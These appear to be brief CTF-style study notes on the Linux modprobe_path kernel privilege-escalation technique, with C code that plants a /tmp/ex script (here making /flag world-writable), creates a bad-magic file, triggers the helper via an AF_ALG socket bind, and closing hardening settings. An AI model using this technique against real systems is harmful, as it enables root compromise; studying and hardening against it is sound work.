modprobe_path
modprobe_path is a kernel global variable that holds the path to the modprobe binary (usually /sbin/modprobe). When the kernel needs to load a module (e.g., when a device is plugged in or a packet with an unknown protocol is received), it executes the file at this path.
Plug and Play
void modprobe_exploit_setup() {
//overwrite modprobe_path string with "/tmp/ex"
//change the script content as needed
FILE *fp = fopen("/tmp/ex", "w");
if (fp) {
fprintf(fp, "#!/bin/sh\n");
fprintf(fp, "chmod 777 /flag\n");
fclose(fp);
}
system("chmod +x /tmp/ex");
// 2. Create the dummy file with invalid magic bytes (0xdeadbeef)
system("echo -e '\xde\xad\xbe\xef' > /tmp/pwn");
system("chmod +x /tmp/pwn");
printf("[+] Modprobe exploit setup complete.\n");
}
More Reliable
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/if_alg.h>
#include <fcntl.h>
#include <sys/mman.h>
int main(void)
{
struct sockaddr_alg sa;
int fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
if (fd < 0) {
perror("Failed");
return 1;
}
memset(&sa, 0, sizeof(sa));
sa.salg_family = AF_ALG;
strcpy((char *)sa.salg_type, "V4bel");
bind(fd, (struct sockaddr *)&sa, sizeof(sa));
return 0;
}
Hardening
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH="/sbin/modprobe"
- With these configs, Linux uses a fixed path. (Cannot overwrite it)